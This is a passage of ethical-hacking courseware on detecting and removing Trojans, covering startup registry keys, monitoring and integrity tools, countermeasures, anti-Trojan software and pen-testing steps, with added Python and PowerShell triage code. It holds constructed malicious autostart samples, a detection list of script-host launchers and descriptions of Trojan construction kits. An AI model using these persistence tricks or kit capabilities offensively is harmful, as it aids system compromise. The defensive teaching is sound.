HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Common Startup
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Common Startup
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, Startup
HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders, Startup
HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows, load
Windows Startup Setting
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
IE Startup Setting
HKCU\Software\Microsoft\Internet Explorer\UrlSearchHooks
HKLM\SOFTWARE\Microsoft\Internet Explorer\Toolbar
HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensions
HKCU\SOFTWARE\Microsoft\Internet Explorer\MenuExt
FIGURE 6.59: Windows 8 Startup Registry Entries
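The four-step startup scan above and the registry locations just listed are what an investigator checks by hand. As an added example, not part of the CEH courseware and not the code of any tool it names, the following Python script triages Run/RunOnce entries offline from a registry export in the .reg format that reg export writes, applying a few defender-side heuristics: a core system binary name outside the Windows directory, an executable in a user-writable location, a script host or living-off-the-land launcher (the payload is then in the arguments), and a bare relative path that Windows resolves through the search order. The export text, the user name, the value names and the paths are constructed for this example; on a Windows host the optional read_live_run_keys helper gathers the same keys through the standard-library winreg module, and the two Startup folders named in Step 1 are checked with a plain directory listing.

```python
"""Triage Windows autostart (Run/RunOnce) entries from a .reg export.

Added example for the startup-scanning steps; not courseware or tool code.
Heuristic hits are hints, not verdicts: confirm publisher, signature and hash.
"""
import re
from pathlib import PureWindowsPath

# Constructed sample of what `reg export` writes for the Run keys. User name,
# paths and value names are made up for this example.
SAMPLE_REG_EXPORT = r'''Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"svchost"="C:\\Users\\alice\\AppData\\Roaming\\svc\\svchost.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\system32\\SecurityHealthSystray.exe"
"Updater"="wscript.exe //B \"C:\\ProgramData\\update.vbs\""
'''

KEY_RE = re.compile(r'^\[(.+)\]$')
VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"="((?:[^"\\]|\\.)*)"$')

# Names of core Windows binaries that malware likes to borrow.
SYSTEM_BINARY_NAMES = {'svchost.exe', 'lsass.exe', 'csrss.exe', 'winlogon.exe',
                       'services.exe', 'explorer.exe'}
# Interpreters and living-off-the-land binaries: the real payload is in the arguments.
SCRIPT_HOSTS = {'cmd.exe', 'powershell.exe', 'wscript.exe', 'cscript.exe',
                'mshta.exe', 'rundll32.exe', 'regsvr32.exe'}
# Path fragments of locations any user can write to.
USER_WRITABLE = ('\\appdata\\roaming\\', '\\appdata\\local\\temp\\', '\\temp\\',
                 '\\users\\public\\', '\\downloads\\')


def _unescape(text):
    # Undo .reg escaping: a backslash protects the next character.
    return re.sub(r'\\(.)', r'\1', text)


def parse_reg_export(text):
    """Return [{'key', 'name', 'command'}] for every string value in the export."""
    entries, current_key = [], None
    for raw in text.splitlines():
        line = raw.strip()
        key_match = KEY_RE.match(line)
        if key_match:
            current_key = key_match.group(1)
            continue
        value_match = VALUE_RE.match(line)
        if value_match and current_key:
            entries.append({'key': current_key,
                            'name': _unescape(value_match.group(1)),
                            'command': _unescape(value_match.group(2))})
    return entries


def command_executable(command):
    """Extract the program from a Run value: the quoted path, else the first token."""
    command = command.strip()
    quoted = re.match(r'"([^"]+)"', command)
    return quoted.group(1) if quoted else command.split(' ', 1)[0]


def assess(entry):
    """Return the list of reasons an autostart entry deserves a closer look."""
    exe = command_executable(entry['command'])
    path = PureWindowsPath(exe)
    name, lowered = path.name.lower(), exe.lower()
    reasons = []
    if name in SYSTEM_BINARY_NAMES and '\\windows\\' not in lowered:
        reasons.append('system binary name outside the Windows directory')
    if any(marker in lowered for marker in USER_WRITABLE):
        reasons.append('executable lives in a user-writable location')
    if name in SCRIPT_HOSTS:
        reasons.append('script host / LOLBin launcher, inspect its arguments')
    if not path.is_absolute():
        reasons.append('relative path resolved through the search order')
    return reasons


def triage(reg_text):
    """Parse an export and return only the entries with at least one reason."""
    flagged = []
    for entry in parse_reg_export(reg_text):
        reasons = assess(entry)
        if reasons:
            flagged.append({**entry, 'reasons': reasons,
                            'executable': command_executable(entry['command'])})
    return flagged


def read_live_run_keys():
    """On Windows, read the real Run/RunOnce keys via winreg; elsewhere return []."""
    try:
        import winreg
    except ImportError:
        return []
    hives = ((winreg.HKEY_LOCAL_MACHINE, 'HKEY_LOCAL_MACHINE'),
             (winreg.HKEY_CURRENT_USER, 'HKEY_CURRENT_USER'))
    subkeys = (r'SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
               r'SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce')
    entries = []
    for hive, hive_name in hives:
        for sub in subkeys:
            try:
                with winreg.OpenKey(hive, sub) as key:
                    index = 0
                    while True:
                        try:  # EnumValue raises OSError once the values run out
                            name, data, _ = winreg.EnumValue(key, index)
                        except OSError:
                            break
                        entries.append({'key': hive_name + '\\' + sub,
                                        'name': name, 'command': str(data)})
                        index += 1
            except OSError:  # key absent or access denied: skip it
                continue
    return entries


if __name__ == '__main__':
    for hit in triage(SAMPLE_REG_EXPORT):
        print(f"{hit['key']}\\{hit['name']}: {hit['executable']}")
        for reason in hit['reasons']:
            print('   -', reason)
```

On the constructed export the script flags the svchost value (a system binary name under AppData\Roaming) and the Updater value (a script host launched by bare name), and leaves OneDrive and SecurityHealth alone. The heuristics are deliberately narrow; the same entries should still be cross-checked against the Startup folders, services.msc and the driver directory from the steps above, since a Trojan need not use the Run keys at all.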
Startup Programs Monitoring Tool: Starter
Starter is a startup manager for Microsoft Windows. It allows you to view and manage all the programs that start automatically whenever the OS is loading.
[Screenshot: Starter (Server 4.0) window showing the Startup sections tree (Startup folders, Registry Run/RunOnce/RunServices keys for the current, all and default users, INI files) and the autostart entries with their values and registry locations]
http://codestuff.tripod.com
Startup Programs Monitoring Tool: Starter
Source: http://codestuff.tripod.com
Starter allows you to view and manage all the programs that start automatically whenever the operating system is loaded. It enumerates all the hidden registry entries, startup folders' items, and some of the initialization files, so that the user can choose to temporarily disable selected entries, edit them, create new ones, or delete them permanently. Starter can also list all the running processes, with the option to view extended process information (such as used DLLs, memory usage, thread count, priorities, etc.) and to terminate a selected process. It supports Microsoft Windows 9x, Me, NT, 2000, XP, 2003, and Vista. There are no specific requirements except one: registry operations on a Windows-NT-based operating system may require special access rights. As a rule, members of the Administrators and Power Users groups have nothing to worry about.
[Screenshot: Starter (Server 4.0) main window listing startup entries by name, value, section (Registry - User Run, Registry - Machine Run, Startup All Users, Registry - User RunOnce) and description]
FIGURE 6.60: Starter Tool Screenshot
Startup Programs Monitoring Tool: Security AutoRun
Security AutoRun displays the list of all applications that are loaded automatically when Windows starts up.
[Screenshot: Security AutoRun main window]
Startup Programs Monitoring Tool: Security AutoRun
Source: http://tcpmonitor.altervista.org
Security AutoRun allows you to view the list of all applications that are loaded automatically when Windows starts up. Each application is listed with the details of its type, registry, common/user, services, drivers list, command-line string, product name, file version, company name, location in the registry or file system, and more. It identifies spyware or adware programs that run at startup. Compatible Windows operating systems are 9x/ME/NT/2000/XP/Vista/7.
[Screenshot: Security AutoRun window showing the autostart tree (current user and all users Run keys, services, drivers, installed components, Winlogon, task scheduler) with the command-line and registry location of each entry]
FIGURE 6.61: Security AutoRun Tool Screenshot
Startup Programs Monitoring Tools
A list of startup programs monitoring tools is as follows:
- Absolute Startup manager available at http://www.absolutestartup.com
- ActiveStartup available at http://www.hexilesoft.com
- StartEd Lite available at http://www.outertech.com
- Startup Inspector available at http://www.windowsstartup.com
- Autoruns for Windows available at http://technet.microsoft.com
- Program Starter available at http://www.ab-tools.com
- Disable Startup available at http://www.disablestartup.com
- StartupMonitor available at http://www.mlin.net
- Chameleon Startup Manager available at http://www.chameleon-managers.com
- Startup Booster available at http://www.smartpctools.com
Scanning for Suspicious Files and Folders
Trojans normally modify the system's files and folders. Use these tools to detect system changes:
FCIV: It is a command line utility that computes MD5 or SHA1 cryptographic hashes for files
TRIPWIRE: It is an enterprise class system integrity verifier that scans and reports critical system files for changes
SIGVERIF: It checks integrity of critical files that have been digitally signed by Microsoft
C:\FCIV>fciv.exe c:\hash.txt
// File Checksum Integrity Verifier version 2.05.
//
6b1fb2f76c139c82253732e1c8824cc2 c:\hash.txt
Scanning for Suspicious Files and Folders
Usually when a system gets infected by a Trojan, it modifies the files and folders; you can scan the files and folders with the following tools in order to detect the Trojans installed.
FCIV
File Checksum Integrity Verifier (FCIV) is a utility that can allow you to generate MD5 or SHA-1 hash values for files that can be verified with the standard values to determine any change in them; if found, you can run a verification of the file system files against the XML database to determine which files have been modified. It is a command-prompt utility that computes and verifies cryptographic hash values of all your critical files and saves the values in an XML file database.
C:\FCIV>fciv.exe c:\hash.txt
// File Checksum Integrity Verifier version 2.05.
//
6b1fb2f76c139c82253732e1c8824cc2 c:\hash.txt
Tripwire
Source: http://www.tripwire.com
Tripwire Enterprise provides the configuration control capabilities organizations need to proactively secure the entire infrastructure and ensure compliance with internal policies, regulations, and industry standards and benchmarks.
SIGVERIF
Source: http://books.google.co.in
SIGVERIF is a signature verification tool that allows you to find signed and unsigned drivers connected to the system. When you find an unsigned driver, you can move it to a new folder, restart the system, and test the program and its functionality for errors. The following are the steps to identify unsigned drivers:
Step 1: Click Start, click Run, type SIGVERIF, and then click OK.
Step 2: Click the Advanced button.
Step 3: Click the option for other files that are not digitally signed.
Step 4: Navigate to the winnt\system32\drivers folder and then click OK.
After SIGVERIF finishes, it checks all the unsigned drivers and the list is displayed on the computer. The investigator can find the list of all signed and unsigned drivers found by SIGVERIF in sigverif.txt in the %windir% folder, typically the winnt or windows folder.
Files and Folder Integrity Checker: FastSum and WinMD5
WinMD5 (http://www.blisstonia.com): WinMD5 is a Windows utility for computing the MD5 hashes ("fingerprints") of files. These fingerprints can be used to ensure that the file is uncorrupted.
FastSum (http://www.fastsum.com): FastSum is used for checking the integrity of files. It computes checksums according to the MD5 checksum algorithm.
[Screenshot: WinMD5 v2.07 (C) 2003-2006 window]
Files and Folder Integrity Checker: FastSum and WinMD5
A files and folder integrity checker allows you to monitor the integrity of files and folders and check for any changes in the critical files, indicating potential intrusion attempts. These work with a suite of security tools to provide a complete audit and monitoring solution for OSS and Guardian file systems.
FastSum
Source: http://www.fastsum.com
FastSum is built on the well-proven MD5 checksum algorithm, which is used worldwide for checking the integrity of files. You can take control of your data with FastSum. Fingerprint your important files now and check the integrity after a network transfer or a CD burning simply by taking the fingerprints again and comparing them with the previously made ones. In the same way, you can also find out whether your files had been damaged by viruses, network issues, or CD/DVD burning failures.
[Screenshot: FastSum 1.7 (unregistered) window listing files with their computed checksums]
FIGURE 6.62: FastSum
WinMD5
Source: http://www.blisstonia.com
WinMD5 v2.0 is a Windows (98, 2000, XP, Vista, 7) utility for computing the MD5 hashes ("fingerprints") of files. It also makes it very easy to compare the fingerprints against the correct fingerprints stored in an MD5SUM file. RedHat, for example, provides MD5SUM files for all of its large downloadable files. These fingerprints can be used to ensure that your file is uncorrupted.
FIGURE 6.63: WinMD5 (screenshot of WinMD5 v2.07 with MD5SUM.md5 loaded: ChangeLog.txt, README.txt and WinMD5.exe report Good, CorruptFile.txt reports BAD; 4 known MD5 hashes found in the MD5SUM file)
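The fingerprint-then-compare workflow that FastSum and WinMD5 perform, as an added Python example (not code from either tool): it writes an md5sum-style manifest, then re-checks the folder and reports Good, BAD, MISSING or NEW per file. SHA-256 is the default because MD5 collisions are practical today, and the manifest itself has to be kept where an intruder cannot rewrite it, or the comparison proves nothing; the sample files are constructed.

```python
import hashlib
import tempfile
from pathlib import Path
from typing import Dict

CHUNK_SIZE = 64 * 1024          # hash in chunks so a large file never sits in memory
HEX_CHARS = set("0123456789abcdef")


def fingerprint(path: Path, algorithm: str = "sha256") -> str:
    """Lowercase hex digest of one file.

    The tools above use MD5. SHA-256 is the default here because MD5 collisions
    are cheap to make, but algorithm="md5" still verifies an MD5SUM file that a
    vendor published.
    """
    h = hashlib.new(algorithm)
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(CHUNK_SIZE), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(root: Path, algorithm: str = "sha256") -> str:
    """Fingerprint every file under root as md5sum/sha256sum-style lines,
    '<hexdigest>  <path relative to root>', with '/' separators for portability."""
    lines = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            lines.append(f"{fingerprint(p, algorithm)}  {p.relative_to(root).as_posix()}")
    return "\n".join(lines) + "\n"


def parse_manifest(text: str) -> Dict[str, str]:
    """Parse manifest lines into {relative path: digest}.

    Accepts CRLF line ends, blank and '#' comment lines, and the '*name' form
    that md5sum writes for files hashed in binary mode. Malformed lines are
    skipped rather than trusted.
    """
    entries: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        digest, name = parts[0].lower(), parts[1]
        if not set(digest) <= HEX_CHARS:
            continue
        entries[name[1:] if name.startswith("*") else name] = digest
    return entries


def verify(root: Path, manifest: Dict[str, str], algorithm: str = "sha256") -> Dict[str, str]:
    """Compare the tree under root with the manifest.

    Status per path: 'Good' (digest matches), 'BAD' (content changed),
    'MISSING' (listed but gone from disk) or 'NEW' (on disk but not in the
    manifest, which is where a planted file shows up).
    """
    report: Dict[str, str] = {}
    for name, expected in manifest.items():
        p = root / name
        if not p.is_file():
            report[name] = "MISSING"
        else:
            report[name] = "Good" if fingerprint(p, algorithm) == expected else "BAD"
    for p in root.rglob("*"):
        rel = p.relative_to(root).as_posix()
        if p.is_file() and rel not in manifest:
            report[rel] = "NEW"
    return report


def demo() -> Dict[str, str]:
    """Constructed scenario (not real data): fingerprint three files, then
    tamper with one, delete one and plant one before re-checking."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "bin").mkdir()
        (root / "README.txt").write_text("original readme\n")
        (root / "ChangeLog.txt").write_text("1.0 initial release\n")
        (root / "bin" / "tool.exe").write_bytes(b"MZ" + b"\x00" * 64)
        # In practice store this manifest read-only and off the monitored host.
        manifest = parse_manifest(build_manifest(root))

        (root / "bin" / "tool.exe").write_bytes(b"MZ" + b"\x00" * 63 + b"\x01")  # one byte changed
        (root / "ChangeLog.txt").unlink()                                      # removed
        (root / "bin" / "helper.dll").write_bytes(b"not in the manifest")      # planted
        return verify(root, manifest)
```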
Files and Folder Integrity Checkers (slide: Advanced Checksum Verifier (ACSV), Fsum Frontend, Verisys, AFICK (Another File Integrity Checker), File Integrity Monitoring, Attribute Manager, PA File Sight, CSP File Integrity Checker, ExactFile, OSSEC)
Files and Folder Integrity Checkers
Files and folder integrity checkers monitor file integrity and identify changes in critical files that indicate potential intrusion attempts. A few files and folder integrity checkers are listed as follows:
• Advanced Checksum Verifier (ACSV), available at http://www.irnis.net
• Fsum Frontend, available at http://fsumfe.sourceforge.net
• Verisys, available at http://www.ionx.co.uk
• AFICK (Another File Integrity Checker), available at http://afick.sourceforge.net
• File Integrity Monitoring, available at http://www.ncircle.com
• Attribute Manager, available at http://www.miklsoft.com
• PA File Sight, available at http://www.poweradmin.com
• CSP File Integrity Checker, available at http://www.tandemsecurity.com
• ExactFile, available at http://www.exactfile.com
• OSSEC, available at http://www.ossec.net
Scanning for Suspicious Network Activities
• Trojans connect back to handlers and send confidential information to attackers
• Use network scanners and packet sniffers to monitor network traffic going to malicious remote addresses
• Run tools such as Capsa to monitor network traffic and look for suspicious activities sent over the web
Scanning for Suspicious Network Activities
After a malicious attack, the Trojans start sending the confidential data present on the system to the attackers. Trojans connect back to handlers and send confidential information to attackers. Use network scanners and packet sniffers to monitor network traffic going to malicious remote addresses. In order to avoid these situations, it's always better to scan the networks for suspicious activities. With the help of scanning utilities, you can know if the data is being transferred to a malicious remote source. By using network scanning tools like Capsa, you can identify such activities.
Detecting Trojans and Worms with Capsa Network Analyzer
Capsa is an intuitive network analyzer, which provides detailed information to help check if there are any Trojan activities on a network
http://www.colasoft.com
Detecting Trojans and Worms with Capsa Network Analyzer
Source: http://www.colasoft.com
Capsa is a network analyzer that provides enough information to help check if there is any Trojan activity on a network. It is a portable network analyzer for LANs/WLANs that performs packet capturing, network monitoring, advanced protocol analysis, in-depth packet decoding, and automatic expert diagnosis. Features of Capsa Network Analyzer include:
• Real-time capture and save data transmitted over local networks, including wired network and wireless network like 802.11a/b/g/n
• Monitor network bandwidth and usage by capturing data packets transmitted over the network and providing summary and decoding information about these packets
• View network statistics, allowing easy capture and interpretation of network utilization data
• Monitor Internet, email, and instant messaging traffic, helping keep employee productivity to a maximum
• Diagnose and pinpoint network problems in seconds by detecting and locating suspicious hosts
• Map out the details, including traffic, IP address, and MAC, of each host on the network, allowing for easy identification of each host and the traffic that passes through each
• Visualize the entire network in an ellipse that shows the connections and traffic between each host
FIGURE 6.64: Detecting Trojans and Worms with Capsa Network Analyzer
Module Flow
So far, we have discussed various Trojans and the ways they infect the system resources or information stored on the computer, as well as ways to detect Trojans on a computer. Once you detect a Trojan, you should immediately delete it and apply countermeasures that offer protection against Trojans and backdoors. These countermeasures minimize risk and provide complete protection to the user's system.
Module flow: Trojan Concepts, Trojans Infection, Types of Trojans, Trojan Detection, Countermeasures, Anti-Trojan Software, Penetration Testing
This section highlights various countermeasures that prevent Trojans and backdoors from entering your system.
Trojan Countermeasures
• Avoid opening email attachments received from unknown senders
• Block all unnecessary ports at the host and firewall
• Avoid accepting the programs transferred by instant messaging
• Harden weak, default configuration settings
• Disable unused functionality including protocols and services
• Monitor the internal network traffic for odd ports or encrypted traffic
Trojan Countermeasures
A Trojan is a malicious program that masquerades as a genuine application. When these Trojans are activated, they lead to many issues such as erasing data, replacing data on a victim's computer, corrupting files, spreading viruses, spying on the victim's system and secretly reporting the data, recording keystrokes to steal sensitive information such as credit card numbers, user names, passwords, etc., and opening a backdoor on the victim's system for carrying out harmful activities in the future. In order to prevent such activities and reduce the risks from Trojans, the following countermeasures should be adopted:
• Avoid opening email attachments received from unknown senders
• Block all unnecessary ports at the host and firewall
• Avoid accepting the programs transferred by instant messaging
• Harden weak, default configuration settings
• Disable unused functionality including protocols and services
• Monitor the internal network traffic for odd ports or encrypted traffic
Trojan Countermeasures (Cont'd)
• Avoid downloading and executing applications from untrusted sources
• Install patches and security updates for the operating systems and applications
• Scan CDs and floppy disks with antivirus software before using
• Avoid typing the commands blindly and implementing pre-fabricated programs or scripts
• Manage local workstation file integrity through checksums, auditing, and port scanning
• Run host-based antivirus, firewall, and intrusion detection software
Trojan Countermeasures (Cont'd)
• Avoid downloading and executing applications from untrusted sources
• Install patches and security updates for the operating systems and applications
• Scan CDs and floppy disks with antivirus software before using
• Restrict permissions within the desktop environment to prevent malicious applications installation
• Avoid typing the commands blindly and implementing pre-fabricated programs or scripts
• Manage local workstation file integrity through checksums, auditing, and port scanning
• Run local versions of antivirus, firewall, and intrusion detection software on the desktop
Backdoor Countermeasures
• Most commercial anti-virus products can automatically scan and detect backdoor programs before they can cause damage
• Educate users not to install applications downloaded from untrusted Internet sites and email attachments
• Use anti-virus tools such as Windows Defender, McAfee, and Norton to detect and eliminate backdoors
Backdoor Countermeasures
Perhaps the old adage "an ounce of prevention is worth a pound of cure" is relevant here. Some backdoor countermeasures are:
• The first line of defense is to educate users regarding the dangers of installing applications downloaded from the Internet, and to be cautious if they have to open email attachments.
• The second line of defense can be antivirus products that are capable of recognizing Trojan signatures. The updates should be regularly applied over the network.
• The third line of defense comes from keeping application versions updated by following security patches and vulnerability announcements. Use antivirus tools such as Windows Defender, McAfee, and Norton to detect and eliminate backdoors.
Trojan Horse Construction Kits
• Trojan Horse construction kits help attackers to construct Trojan horses of their choice
• The tools in these kits can be dangerous and can backfire if not executed properly
Kits shown: Trojan Horse Construction Kit, Progenic Mail Trojan Construction Kit (PMT), Pandora's Box
Trojan Horse Construction Kits
These kits help attackers construct Trojan horses of their choice. The tools in these kits can be dangerous and can backfire if not executed properly. Some of the Trojan kits available in the wild are as follows:
• The Trojan Horse Construction Kit v2.0 consists of three EXE files: Thck-tc.exe, Thck-fp.exe, and Thck-tbc.exe. Thck.exe is the actual Trojan constructor. With this command-line utility, the attacker can construct a Trojan horse of his or her choice. Thck-fp.exe is a file size manipulator. With this, the attacker can create files of any length, pad out files to a specific length, or even append a certain number of bytes to a file. Thck-tbc.exe will turn any COM program into a Time Bomb.
• The Progenic Mail Trojan Construction Kit (PMT) is a command-line utility that allows an attacker to create an EXE (PM.exe) to send to a victim.
• Pandora's Box is a program designed to create Trojans/time bombs.
Module Flow
Prior to this, we have discussed various countermeasures that offer protection to your computer system and the information stored on it against various malware such as Trojans and backdoors. In addition to these, there is anti-Trojan software that can protect your computer systems and other information assets against Trojans and backdoors. Anti-Trojan software deals with removing or deactivating malware.
Module flow: Trojan Concepts, Trojans Infection, Types of Trojans, Trojan Detection, Countermeasures, Anti-Trojan Software, Penetration Testing
This section lists and describes various anti-Trojan software programs.
Anti-Trojan Software: TrojanHunter
TrojanHunter is an advanced malware scanner that detects all sorts of malware such as Trojans, spyware, adware, and dialers
• Memory scanning for detecting any modified variant of a particular build of a Trojan
• Registry scanning for detecting traces of Trojans in the registry
• Inifile scanning for detecting traces of Trojans in configuration files
• TrojanHunter Guard for resident memory scanning - detect any Trojans if they manage to start up
http://www.trojanhunter.com
Anti-Trojan Software: TrojanHunter
Source: http://www.trojanhunter.com
TrojanHunter is a malware scanner that detects and removes all sorts of malware, such as Trojans, spyware, adware, and dialers, from your computer. Some of TrojanHunter's features include:
• High-speed file scan engine capable of detecting modified Trojans
• Memory scanning for detecting any modified variant of a particular build of a Trojan
• Registry scanning for detecting traces of Trojans in the registry
• Inifile scanning for detecting traces of Trojans in configuration files
• Port scanning for detecting open Trojan ports
• The Advanced Trojan Analyzer, an exclusive feature of TrojanHunter, is able to find whole classes of Trojans using advanced scanning techniques
• TrojanHunter Guard for resident memory scanning - detect any Trojans if they manage to start up
• LiveUpdate utility for effortless ruleset updating via the Internet
• Process list giving details about every running process on the system, including the path to the actual executable file
• Accurate removal of all detected Trojans - even if they are running or if the Trojan has injected itself into another process
FIGURE 6.65: TrojanHunter Anti-Trojan Software (screenshot of a completed full scan: 147791 objects scanned, 2 Trojans found)
Anti-Trojan Software: Emsisoft Anti-Malware
Emsisoft Anti-Malware provides PC protection against viruses, Trojans, spyware, adware, worms, bots, keyloggers, and rootkits
• Two combined scanners for cleaning: Anti-Virus and Anti-Malware
• Three guards against new infections: file guard, behavior blocker, and surf protection
http://www.emsisoft.com
Anti-Trojan Software: Emsisoft Anti-Malware
Source: http://www.emsisoft.com
Emsisoft Anti-Malware provides reliable protection of your system against various threats such as viruses, Trojans, spyware, adware, worms, bots, keyloggers, and rootkits. It has two combined scanners (antivirus and anti-malware) for cleaning infection and three guards against new infections: file guard, behavior blocker, and surf protection.
FIGURE 6.66: Emsisoft Anti-Malware (screenshot of a finished scan: 497483 objects scanned, 317 detected, 0 removed; registry traces rated medium risk and files rated high risk, with "View all detected locations" links per item)
Anti-Trojan Software (slide: Anti-Trojan Shield (ATS), Spyware Doctor, Anti Malware BOClean, Anti Hacker, XoftSpySE, SPYWAREfighter, Anti Trojan Elite, SUPERAntiSpyware, Trojan Remover, Twister Antivirus)
Anti-Trojan Software
Anti-Trojan software provides protection to your computer system and the information stored on it by blocking various malicious threats such as Trojans, worms, viruses, backdoors, malicious ActiveX controls, and Java applets from entering your system. A few of the anti-Trojan software programs that are used for the purpose of killing malware are listed as follows:
• Anti-Trojan Shield (ATS), available at http://www.atshield.com
• Spyware Doctor, available at http://www.pctools.com
• Anti Malware BOClean, available at http://www.comodo.com
• Anti Hacker, available at http://www.hide-my-ip.com
• XoftSpySE, available at http://www.paretologic.com
• SPYWAREfighter, available at http://www.spamfighter.com
• Anti Trojan Elite, available at http://www.remove-trojan.com
• SUPERAntiSpyware, available at http://www.superantispyware.com
• Trojan Remover, available at http://www.simplysup.com
• Twister Antivirus, available at http://www.filseclab.com
Module Flow
As a penetration tester, you should follow the same strategies as that of an attacker to test your network or system against Trojan and backdoor attacks. You should perform all the available attacking techniques including the newly emerged attacking techniques. This allows you to figure out the loopholes or vulnerabilities in the target organization's security. If you find any vulnerabilities or loopholes, you should suggest countermeasures that can make the organization's security better and stronger.
Module flow: Trojan Concepts, Trojans Infection, Types of Trojans, Trojan Detection, Countermeasures, Anti-Trojan Software, Penetration Testing
Pen Testing for Trojans and Backdoors
• Scan the system for open ports, running processes, registry entries, device drivers and services
• If any suspicious port, process, registry entry, device driver or service is discovered, check the associated executable files
• Collect more information about these from publisher's websites, if available, and Internet
• Check if the open ports are known to be opened by Trojans in wild
Scan for open ports: use tools such as TCPView and CurrPorts
Scan for running processes: use tools such as What's Running
Scan for registry entries: use tools such as jv16 PowerTools 2012 and PC Tools Registry Mechanic
Scan for device drivers installed on the computer: use tools such as DriverView and DriverDetective
Scan for Windows services: use tools such as SrvMan and ServiWin
Pen Testing for Trojans and Backdoors

Step 1: Scan for open ports

Open ports are the primary sources to launch attacks. Therefore, in an attempt to make your network secure by conducting pen testing, you should find the open ports and protect them. You can find the unnecessary open ports by scanning for open ports. For this purpose, you can use tools such as TCPView and CurrPorts.

Step 2: Scan for running processes

Most Trojans don't require the user to start the process. They start automatically and don't even notify the user. This kind of Trojan can be detected by scanning for running processes. In order to scan for running processes, you can use tools such as What's Running, which scans your system and lists all currently active programs, processes, services, modules, and network connections. It also includes special areas to display startup programs.

Step 3: Scan for registry entries

A few Trojans run in the background without any notification to the system's user. If you want to test for such Trojans, then you should scan for registry entries. This can be done with the help of tools such as JV PowerTools and PC Tools Registry Mechanic.
Step 4: Scan for device drivers installed on the computer

In order to control the hardware, most modern OSes use their own device drivers. Attackers can take advantage of this situation to spread Trojans and backdoors through device driver files. Trojans spread through device drivers infect the device driver files and other processes.

Step 5: Scan for Windows services

If you find any of the Windows services suspicious, then check the associated executable files. To scan Windows services, you can use tools such as SrvMan and ServiWin.
Step 6: Scan for startup programs

Some Trojans run automatically when you start Windows. Therefore, scan for startup programs using tools such as Starter, Security AutoRun, and Autoruns, check the listed startup programs, and determine if all the programs in the list can be recognized with known functionalities.

Step 7: Scan for files and folders

The easy way for an attacker to hack a system is with the use of files embedded with Trojan packages. Firewalls, IDSes, and other security mechanisms may fail to prevent this kind of attack. Therefore, you need to scan all files and folders for Trojans and backdoors. You can scan files and folders using tools such as FCIV, TRIPWIRE, SIGVERIF, FastSum, and WinMD5.

Step 8: Scan for network activities

Network activities such as upload of bulk files or unusually high traffic going to a particular web address may sometimes represent a sign of a Trojan. You should scan for such network activities. Tools such as Capsa Network Analyzer can be used for this purpose.
Step 9: Scan for modification to OS files

Check the critical OS files for modification or manipulation using tools such as TRIPWIRE, or manually compare hash values if you have a backup copy.

Step 10: Run Trojan Scanner to detect Trojans

Trojan scanners such as Trojan Hunter and Emsisoft Anti-Malware are readily available in the market. You can install and run those Trojan scanners to detect Trojans on your system.
Pen Testing for Trojans and Backdoors (Cont'd)

Document all the findings: document all your findings in the previous steps; it helps in determining the next action if Trojans are identified in the system.

If Trojans are detected (YES):

Isolate the machine from the network: isolate the infected system from the network immediately to prevent further infection.

Sanitize the complete system for Trojans using an updated anti-virus solution to clean Trojans.
Pen Testing for Trojans and Backdoors (Cont'd)

Step 11: Document all the findings

Once you conduct all possible tests to find the Trojans, document all the findings that you obtain at each test for analysis and check if there is any sign of a Trojan.

Step 12: Isolate the machine from the network

When you find a Trojan on a machine, you should isolate the machine immediately from the network before it takes control over other systems in the network. Check whether the antivirus software is updated or not. If the antivirus is not updated, then update it and then run it to scan the system. If the antivirus is already updated, then find other antivirus solutions to clean Trojans.
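The twelve steps above amount to one host triage pass, and the PowerShell below is an added example of that pass (it is not part of the CEH courseware or any of the tools it names): it collects the executables behind listening ports, running processes, services, drivers and startup entries (Steps 1, 2, 4, 5 and 6), checks each image's Authenticode signature as the "check the associated executable files" step, and flags hash drift against a baseline for Step 9. It assumes Windows 8 / Server 2012 or later, an elevated session, and a hypothetical baseline CSV with Path,Hash columns recorded earlier on a known-clean build.

```powershell
# Added example, not the courseware's own code: one triage pass over the artefacts
# Steps 1-6 and 9 say to review (listening ports and their owning processes, services,
# drivers, startup entries), checking each image's Authenticode signature and comparing
# its SHA-256 hash to a baseline. Assumes Windows 8 / Server 2012+ and an elevated session.

function Resolve-ImagePath {
    param([string]$CommandLine)
    if ([string]::IsNullOrWhiteSpace($CommandLine)) { return $null }
    # Quoted path first, else the shortest prefix ending in .exe/.sys/.dll
    if     ($CommandLine -match '^"([^"]+)"')              { $p = $Matches[1] }
    elseif ($CommandLine -match '^(.+?\.(?:exe|sys|dll))') { $p = $Matches[1] }
    else   { $p = ($CommandLine -split '\s+')[0] }
    # Driver images are often recorded with kernel-style path prefixes
    return ($p -replace '^\\\?\?\\', '' -replace '^\\SystemRoot', $env:SystemRoot)
}

function Get-TriageCandidates {
    # Steps 1-2: listening ports and the processes behind them
    foreach ($c in Get-NetTCPConnection -State Listen) {
        $proc = Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue
        [pscustomobject]@{ Source = "port $($c.LocalPort)"; Path = $proc.Path }
    }
    # Step 5 services, Step 4 kernel drivers, Step 6 startup entries
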